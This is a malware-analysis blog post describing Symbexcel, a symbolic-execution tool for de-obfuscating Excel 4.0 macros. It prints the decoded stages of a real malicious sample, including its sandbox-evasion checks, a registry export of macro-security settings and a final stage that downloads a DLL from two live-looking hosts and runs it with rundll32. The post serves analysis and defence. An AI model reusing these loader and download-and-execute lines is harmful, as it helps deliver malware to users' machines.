Threat Analysis Unit

Symbexcel: Bringing the Power of Symbolic Execution to the Fight Against Malicious Excel 4 Macros

Office macros are a popular attack vector to compromise a user’s environment and deploy additional components. That’s because macros can hide within documents, often under several layers of obfuscation. In recent years, there has been an increase in attacks that leverage Excel 4.0 macros as threat actors have realized the power that this legacy functionality provides to an attacker.

Analyzing Excel 4.0 macros can be a daunting task, because the analysis often requires manual, step-by-step execution of the code to extract behaviors and IoCs such as the URLs from which additional malware components will be downloaded.

In this blog, we present Symbexcel, a novel solution based on symbolic execution for the automated de-obfuscation and analysis of Excel 4.0 macros. Our approach was recently presented at BlackHat 2021 [1].

What Are Excel 4.0 Macros?

Excel 4.0 macros, or XLM macros, are a 30-year-old feature of Microsoft Excel that allows one to encode a series of operations into the contents of spreadsheet cells. Distinct from the traditional functions provided by an Excel spreadsheet (such as SUM), Excel 4.0 macro functions have access to the Windows API and can be used to interact with the underlying operating system — that is, they can execute external commands or invoke the PowerShell.

These macros, which have largely been made obsolete by VBA macros, reside on an Excel 4.0-enabled macro sheet. A macro execution starts from a specific cell (identified by the Auto_Open label). Once the function in that cell is executed, the control flow moves to the cell below it, and so on. The standard control flow can be modified with functions such as GOTO, which allows one to jump to a different cell.

The content of cells can be modified using the FORMULA and FORMULA.FILL functions. These functions support dynamic code generation, in which the function to be performed is first written to a cell and then the control flow is directed to that cell, making static analysis of code extremely challenging.

Evasion and Obfuscation

The flexibility of Excel 4.0 macros supports both obfuscation and evasion techniques.

In a series of previous posts [2] [3], we have described how these techniques evolve over time to foil analysis attempts and avoid detection. For example, the ability to query the operating environment through the GET.WORKSPACE function allows a macro to exit execution if a mouse is not connected (as may be the case in an artificial analysis environment, such as an emulator). In addition, by using functions like CHAR to translate integers to letters, it’s possible to assemble strings from separate pieces, write them to cells, and then execute them, making static string extraction challenging. Another technique we observed is the use of time information (e.g., the current date) as a key for decrypting parts of the code. In this case, unless the macro is executed on the correct date, the generated code is gibberish, and the malicious behavior is not exposed.For example, the ability to query the operating environment through the GET.WORKSPACE function allows a macro to exit execution if a mouse is not connected (as may be the case in an artificial analysis environment, such as an emulator). In addition, by using functions like CHAR to translate integers to letters, it’s possible to assemble strings from separate pieces, write them to cells, and then execute them, making static string extraction challenging. Another technique we observed is the use of time information (e.g., the current date) as a key for decrypting parts of the code. In this case, unless the macro is executed on the correct date, the generated code is gibberish, and the malicious behavior is not exposed.

To bypass these evasion and obfuscation techniques, an analyst needs to fully understand what the environmental requirements are and what boundary conditions for the correct execution of the macro must be satisfied. Otherwise, it becomes difficult, if not impossible, to execute the macro in an analysis environment and extract the IoCs associated with its execution.

Unfortunately, understanding which values need to be returned by functions such as GET.WORKSPACE is not always straightforward, because these values can be used in conditional statements that may lead to a series of complex de-obfuscation steps.

The Power of Symbolic Execution

The need for the automated processing of evasive and obfuscated Excel 4.0 macros led us to attempt to use a well-known analysis technique that is popular in program analysis, called symbolic execution.

In symbolic execution, the inputs to a program, which are usually concrete, such as “5” or “hello world!”, are left unspecified, and a symbol is kept in their place. If this symbolic value, say X, is used in a computation, the result of that computation will be another symbolic value, say Y, which is defined on the basis of X (e.g., Y = X + 1).

Keeping track of these symbolic values is relatively straightforward until they are used in a conditional statement, such as an IF function, as in IF(Y<10, branch1, branch2). Since the value of the variable is unknown, in most cases it is impossible to decide which branch will be taken by the computation. Therefore, the state of the computation is duplicated: one computation will proceed following the true branch (of course remembering the associated constraint, which in our case is Y<10), while the other will proceed following the false branch (with the associated constraint of Y>=10).

By doing this, we can follow all possible computations (with a caveat due to the possibility of an exponential explosion in the number of states and paths), until a certain point in the program is reached. At that point, one can take all the constraints collected and solve them to find a concrete program input (e.g., X=2) that would lead the execution of the program to the specified location.

Symbexcel

We applied the power of symbolic execution to Excel 4.0 macros and we developed a tool, called Symbexcel, that supports the automated analysis of these macros.

By using symbolic values when a macro retrieves information from the surrounding environment (e.g., the screen size, or the time of day) it’s possible to track how that information is used throughout the execution of the macro until a point of interest is reached. At that point, by using a solver, it’s possible to determine likely concrete values for the symbolic values, obtaining the de-obfuscated code.

DiagramDescription automatically generated
The architecture of the Symbexcel tool has three main components, as shown in Figure 1.

The Loader component takes an Excel 4.0 macro, parses it, and loads it in the Simulation Manager, initializing the memory and the execution environment.

Then, the Simulation Manager starts executing the macro, creating a new execution state (with the associated constraints) whenever a conditional that uses a symbolic value is encountered.

When one of the current states is considered for execution, the formula in the current cell is parsed and executed using a formula handler. When the parameters of the formula are not symbolic, the formula is simply executed. However, whenever one or more of the parameters are symbolic, the result of the execution may be symbolic as well.

This execution process continues until the function contained in a cell is a symbolic value itself. When this happens, the simulation manager needs to make the symbolic value concrete, so that the resulting function can be executed.

For example, if the contents of a cell are =Y(A4:A10), where Y is a symbolic value, what function will the Simulation Manager execute?

At this point, the Solver Backend, the third component of Symbexcel’s architecture, comes into play. By relying on the Z3 SMT solver, the Solver Backend is able to derive a concrete string that represents the most likely function.

Note that we said “most likely” because in many cases a symbolic expression has many possible concretizations. Consider for example the simple constraint X<42. In this case, X could take infinite values that satisfy the constraint. Similarly, when concretizing a formula, one might derive strings that are not valid functions. Therefore, the Solver Backend leverages the Excel 4.0 macro grammar as an oracle, to find a concrete solution that is also a valid function.

Once the function is found, the code is automatically de-obfuscated, and the execution can continue.

Symbexcel in Action

To give an example of how Symbexcel can automatically de-obfuscate Excel 4.0 macros, let’s look at a particular sample, namely an Excel file with the hash 7f606056d6fcb2de7eb72c8eeef9746428bd24bf. This file contains a worksheet named Sheet1 and an Excel 4.0 macro sheet named boxing.

The built-in name Auto_Open points to the cell boxing!A50, and therefore execution will start from the contents of that cell. The sample is structured as a multi-stage payload: an initial de-obfuscation routine decrypts the first stage, and then a second routine is used to de-obfuscate the second, third, and fourth stages.

De-obfuscation Routine 1

The initial de-obfuscation routine is composed of two nested loops. We renamed most of the variables and added some comments to make the code more readable. The outer loop loops through all the obfuscated instructions:

[boxing!$A$49] 0.0

[boxing!$A$50] =SET.NAME(“insn_index”,A49)

[boxing!$A$52] =WHILE(AND(insn_index<32.0))

[boxing!$A$53] =SET.NAME(“char_index”,-2.0)

[boxing!$A$54] =COUNTBLANK($G$11:$I$53)

[boxing!$A$57] =SET.NAME(“insn_index”,insn_index+1.0)

[boxing!$A$60] =COUNT($H$26:$J$72)

[boxing!$A$61] =SET.NAME(“deobfuscated_insn”,””)

[boxing!$A$64] =COUNTBLANK($G$11:$H$49)

<inner loop>

[boxing!$A$77] =FORMULA(deobfuscated_insn,OFFSET($A$79,insn_index-1.0,0.0))

[boxing!$A$78] =NEXT()

The first stage payload is written (by the FORMULA instruction at boxing!$A$77) one instruction at a time — after every inner loop — to the cells from A79:A110 (32 total instructions). Note: Instructions A54, A60, and A64 seem to be irrelevant for the execution.

The inner loop goes through all the characters (or sub-strings) in the instruction and concatenates them into the variable deobfuscated_insn:

[boxing!$A$65] =WHILE(char_index<116.0)

[boxing!$A$67] =SET.NAME(“char_index”,char_index+2.0)

# read the next character

[boxing!$A$71] =T(OFFSET($C$50,char_index,insn_index))

[boxing!$A$72] =COUNT($C$12:$F$53) # not relevant?

# append the new character or break if it’s the termination sequence

[boxing!$A$73] =IF($A$71=”mfQlphHzOI”,SET.NAME(“char_index”,116.0),SET.NAME(“deobfuscated_insn”,deobfuscated_insn&$A$71))

[boxing!$A$74] =MIN(362.0,-723.0) # not relevant?

[boxing!$A$75] =NEXT()

Every instruction has a maximum length of 59 characters (char_index-2 to 116 at increments of 2). The characters are read from the range D50:AI166 (vertically). The termination string for every character sequence is mfQlphHzOI.

The First Stage

The de-obfuscated first stage payload is:

[boxing!$A$79] =CALL(“Xlcall32″,”Excel4″,”2JRJRR#”,4,,2,100,200)

[boxing!$A$80] =ON.TIME(NOW()+”00:00:01″, “R104C1”)

[boxing!$A$104] routine2=R82C1

# routine2 pre-initialization

[boxing!$A$105] start_row=50

[boxing!$A$106] start_col=1

[boxing!$A$107] key=R50C3:R59C3

[boxing!$A$108] num_insns=17

[boxing!$A$109] payload_destination=R111C1

[boxing!$A$110] =routine2()

<deobfuscation routine 2>

Deobfuscation Routine 2

The second de-obfuscation routine is very different from the first one. The payload is not simply concatenated. Every encrypted character is read from the worksheet Sheet1 and decrypted using a Vigenère cipher and a decryption key, which is stored in a memory range, i.e., C50:C59 for the second stage.

There is an initialization sequence:

[boxing!$A$82] key_index=0

[boxing!$A$83] insn_index=0

[boxing!$A$84] key_length=ROWS(key)

There is an outer loop:

[boxing!$A$85] =WHILE(insn_index<num_insns)

[boxing!$A$86] char_index=-1

[boxing!$A$87] insn_index=insn_index+1

[boxing!$A$88] deobfuscated_insn=””

<inner loop>

# after every inner loop, write the deobfuscated instruction to an offset calculated from payload_destination

[boxing!$A$101] =FORMULA(deobfuscated_insn,ABSREF(“R[“&(insn_index-1)&”]C[0]”,payload_destination))

[boxing!$A$102] =NEXT()

[boxing!$A$103] =RETURN()

And here is the inner loop:

[boxing!$A$89] =WHILE(char_index<500)

[boxing!$A$90] char_index=char_index+1

# read the encrypted character from the worksheet Sheet1

[boxing!$A$91] =INDIRECT(ADDRESS(char_index+start_row,insn_index+start_col,,,”Sheet1″))

# break if it is the termination character

[boxing!$A$92] =IF(R91C1>1000)

[boxing!$A$93] char_index=500

# else read the corresponding key value (and increment key_index)

[boxing!$A$94] =ELSE()

[boxing!$A$95] i=MOD(key_index,key_length)+1

[boxing!$A$96] key_value=INDEX(key,i)

[boxing!$A$97] key_index=key_index+1

# shift and concatenate the encrypted character using the key value (Vigenere)

[boxing!$A$98] deobfuscated_insn=deobfuscated_insn&CHAR(R91C1-key_value)

[boxing!$A$99] =END.IF()

[boxing!$A$100] =NEXT()

Second Stage

Once de-obfuscated, the second stage payload is executed:

# write the 1st character of the final key

[boxing!$A$111] =FORMULA(INT(ALERT(“The workbook cannot be opened or repaired by Microsoft Excel because it’s corrupt.”))+-2,R60C3)

This is the first step in which we produce a symbolic value, because the ALERT function might return a true or false value depending on the fact that the macro is executed in the proper execution environment. As a result, the value written by the FORMULA function in cell $C$60 (which is R60C3, or Row 60 Column 3) will be symbolic.

The script continues with the following instructions:

[boxing!$A$112] =ERROR(TRUE,R114C1)

# write the 2nd character of the final key

[boxing!$A$113] =FORMULA(INT(FILE.DELETE(GET.DOCUMENT(2)&”\”&GET.WINDOW(31)&”:Zone.Identifier”))+480,R61C3)

Once again, the value written by the FORMULA function in cell $C$61 is symbolic. The execution continues with the following instructions:

[boxing!$A$114] =IF(ISERROR(R113C1),CLOSE(FALSE),)

# write the 3rd character of the final key

[boxing!$A$115] =FORMULA(INT(CALL(“Xlcall32″,”Excel4″,”2JRJRR#”,4,,2,-524,397)=-127)+241,R62C3)

# write the 4th character of the final key

[boxing!$A$116] =APP.MAXIMIZE()

[boxing!$A$117] =FORMULA(INT(AND(ISNUMBER(SEARCH(“Win”,GET.WORKSPACE(1))),GET.WORKSPACE(14)>390,GET.WORKSPACE(42),GET.WORKSPACE(19),GET.WORKSPACE(13)>800))+-40,R63C3)

Note that the GET.WORKSPACE calls above are used to obtain the parameters for the execution environment, and, therefore, symbolic values are returned for all those invocations.

# write the 5th character of the final key

[boxing!$A$118] =NOW()

[boxing!$A$119] =WAIT(NOW()+”00:00:01″)

[boxing!$A$120] =NOW()

[boxing!$A$121] =FORMULA(INT((R120C1-R118C1)*100000>1)+-850,R64C3)

The above code checks whether or not the timing is implemented correctly (i.e., a second has actually passed when a one second delay was requested), and in this case the NOW function returns symbolic values.

# routine2 pre-initialization

[boxing!$A$122] start_row=50

[boxing!$A$123] start_col=18

[boxing!$A$124] key=R60C3:R64C3

[boxing!$A$125] num_insns=24

[boxing!$A$126] payload_destination=R128C1

[boxing!$A$127] =routine2()

In sum, the second stage is used to calculate the first five characters of the final key — which is the key used to de-obfuscate the fourth (and final) stage. These first five characters are also used to de-obfuscate the third stage.

Third Stage

The de-obfuscation routine used for the third stage is the same as that used for the second stage, which we called routine2.

Once de-obfuscated, the routine is the following:

[*boxing!$A$128] p=”C:\Users\Public\Documents\”

# open and write random stuff to a file just to make it more complex to calculate the 6th character of the final key

[*boxing!$A$129] =FOPEN(p&”iYUebH.txt”,3)

[*boxing!$A$130] =WHILE(FSIZE(R129C1)<5336)

Note that the three instructions above, marked with a *, were symbolic in nature.

At this point, in order to understand which function to execute, the solver needs to concretize the symbolic values using the constraints.

For example, the contents of $A$130 are the following:

Concat(Unit(int2bv(ToInt(-788 – ToReal(If(observer_4, 1, 0) + -850) + 1/100000000))), Concat(“W”, Concat(Unit(int2bv(ToInt(553 – ToReal(If(file_delete_handler_1, 1, 0) + 480) + 1/100000000))), Concat(Unit(int2bv(ToInt(315 – ToReal(If(observer_1, 1, 0) + 241) + 1/100000000))), Concat(Unit(int2bv(ToInt(37 – ToReal(If(observer_and_1, 1, 0) + -40) + 1/100000000))), Concat(Unit(int2bv(ToInt(-780 – ToReal(If(observer_4, 1, 0) + -850) + 1/100000000))), Concat(“(“, Concat(Unit(int2bv(ToInt(551 – ToReal(If(file_delete_handler_1, 1, 0) + 480) + 1/100000000))), Concat(Unit(int2bv(ToInt(325 – ToReal(If(observer_1, 1, 0) + 241) + 1/100000000))), Concat(Unit(int2bv(ToInt(34 – ToReal(If(observer_and_1, 1, 0) + -40) + 1/100000000))), Concat(Unit(int2bv(ToInt(-759 – ToReal(If(observer_4, 1, 0) + -850) + 1/100000000))), Concat(“E”, Concat(Unit(int2bv(ToInt(521 – ToReal(If(…, …, …) + 480) + 1/100000000))), Concat(Unit(int2bv(ToInt(324 – ToReal(… + …) + 1/100000000))), Concat(Unit(int2bv(ToInt(10 – ToReal(…) + 1/100000000))), Concat(Unit(int2bv(ToInt(… – … + 1/100000000))), Concat(“9”, Concat(Unit(int2bv(ToInt(…))), Concat(Unit(int2bv(…)), Concat(Unit(…), Concat(…, …)))))))))))))))))))))

Symbexcel uses the Z3 SMT solver combined with meta-information about the Excel grammar to derive the string WHILE(FSIZE(R129C1)<5336) from the constraints that define the symbolic value.

The execution continues with the following instructions:

[boxing!$A$131] =FWRITE(R129C1,CHAR(RANDBETWEEN(33,125)))

[boxing!$A$132] =NEXT()

# write the 6th character of the final key

[*boxing!$A$133] =FORMULA(INT(FSIZE(R129C1)=5336)+540,R65C3)

[*boxing!$A$134] =FCLOSE(R129C1)

# write the register key Excel\Security to C:\Users\Public\Documents\bZPf.txt

[*boxing!$A$135] =”EXPORT HKCU\Software\Microsoft\Office\”&GET.WORKSPACE(2)&”\Excel\Security “&p&”bZPf.txt /y”

[*boxing!$A$136] =CALL(“Shell32″,”ShellExecuteA”,”JJCCCJJ”,0,”open”,”C:\Windows\system32\reg.exe”,R135C1,0,5)

[*boxing!$A$137] =WHILE(ISERROR(FILES(p&”bZPf.txt”)))

# open the file and read 255 bytes at offset 215 into A142

[*boxing!$A$140] =FOPEN(p&”bZPf.txt”)

[*boxing!$A$141] =FPOS(R140C1,215)

[*boxing!$A$142] =FREAD(R140C1,255)

[*boxing!$A$143] =FCLOSE(R140C1)

[*boxing!$A$144] =FILE.DELETE(p&”bZPf.txt”)

# check if macro security = “Enable All” (used to calculate the 7th character of the final key)

[*boxing!$A$145] =FORMULA(INT(ISNUMBER(SEARCH(“””VBAWarnings””=dword:00000001”,R142C1)))+774,R66C3)

# routine2 pre-initialization

[*boxing!$A$146] start_row=50

[*boxing!$A$147] start_col=42

[*boxing!$A$148] key=R60C3:R66C3

[*boxing!$A$149] num_insns=9

[*boxing!$A$150] payload_destination=R152C1

[*boxing!$A$151] =routine2()

Again, one can see that many of the instructions above were actually symbolic and were made concrete using Symbexcel’s solver.

The third stage calculates the 6th and 7th characters of the final key, and then dispatches the execution to the de-obfuscation routine routine2 to de-obfuscate the final stage.

The values of the final key are: [-1, 481, 242, -39, -849, 541, 774].

Fourth Stage

The decrypted fourth stage shows the URLs used to download the additional components of the malware.

[*boxing!$A$152] zzz=”https://derocktech.com/k.php”

[*boxing!$A$153] xxx=”https://solemnenterprise.com/k.php”

[*boxing!$A$154] =CALL(“urlmon”,”URLDownloadToFileA”,”JJCCJJ”,0,zzz,p&”aby.txt”,0,0)

[*boxing!$A$155] =IF(R154C1<>0,,GOTO(R157C1))

[*boxing!$A$156] =CALL(“urlmon”,”URLDownloadToFileA”,”JJCCJJ”,0,xxx,p&”aby.txt”,0,0)

[*boxing!$A$157] a=”ShellExecuteA”

[*boxing!$A$158] b=”C:\Windows\system32\rundll32.exe”

[*boxing!$A$159] =CALL(“Shell32″,a,”JJCCCJJ”,0,”open”,b,p&”aby.txt,DllRegisterServer “,0,5)

[*boxing!$A$160] =CLOSE(FALSE)

More precisely, the final stage downloads a file from https://derocktech.com/k.php (or from https://solemnenterprise.com/k.php if the first endpoint fails) and saves it to C:\Users\Public\Documents\aby.txt. This file is a Windows DLL, which is loaded and registered using rundll32.exe.

The whole execution graph, with the instructions that were symbolic in green, is shown below.

Diagram, schematicDescription automatically generated
Figure 2: Excel 4.0 macro execution flow. The green nodes contained symbolic values. The red node is a failed concretization that resulted in an abandoned path.

Note that the red node in the figure above is the result of a failed concretization. This is because, as explained earlier, there may be multiple values that satisfy a particular set of constraints. However, once a set of values is chosen, Symbexcel uses meta-information about the grammar of Excel instructions to remove concretizations that would lead to incorrect results.

The Symbexcel Advantage

The use of symbolic execution brings a new tool to the fight against obfuscated macros that perform checks against the environment in order to evade analysis. This Excel 4.0 sample will de-obfuscate correctly only if the host has the correct environment. A possible set of correct environment values is:

call_handler_2 = -127 # call at boxing!$A$115 (spawn a new process) succeeds

call_handler_4 != 0 # call at boxing!$A$154 (download DLL) succeeds

workspace_1 = “Win” # operating system

workspace_13 = 801 # workspace width

workspace_14 = 391 # workspace height

workspace_19 = True # mouse present

workspace_42 = True # sound enabled

(boxing!$A$120 – boxing!$A$118)*100000 > 1 # time difference after wait

file_delete_handler_1 = True # Alternate Data Streams (ADS) are present

observer_isnumber_2 = False # macro security != “Enable All”

While it would be extremely complex for an analyst to determine which values would eventually lead to the correctly de-obfuscated code, Symbexcel is able to automatically collect and resolve the constraints to reach the final stage of this complex de-obfuscation process.

Conclusions

Excel 4.0 macros are a continuously evolving threat that is challenging to de-obfuscate and execute correctly in order to extract behaviors and IoCs. In this post, we described a novel approach, called Symbexcel, that harnesses the power of symbolic execution to support the automated analysis of these macros. By running our tool on thousands of Excel 4.0 macros and comparing the results to existing analysis tools, we’ve shown that Symbexcel can handle sophisticated evasion and obfuscation techniques that make existing analysis tools fail.

Contributors

The work in this report was contributed by Giovanni Vigna and Nicola Ruaro.

Bibliography

[1] G. Vigna, N. Ruaro, F. Pagani and S. Ortolani, “Symbexcel: Bringing the Power of Symbolic Execution to the Fight Against Malicious Excel 4 Macros,” VMware, August 2021. [Online]. Available: https://www.blackhat.com/us-21/briefings/schedule/#symbexcel-bringing-the-power-of-symbolic-execution-to-the-fight-against-malicious-excel–macros-22893.
[2] S. Ortolani and J. Haughom, “Evolution of Excel 4.0 Macro Weaponization,” Lastline, 2 June 2020. [Online]. Available: https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/.
[3] B. Singh, “Evolution of Excel 4.0 Macro Weaponization – Part 2,” VMware, 14 October 2020. [Online]. Available: https://blogs.vmware.com/networkvirtualization/2020/10/evolution-of-excel-4-0-macro-weaponization-continued.html/.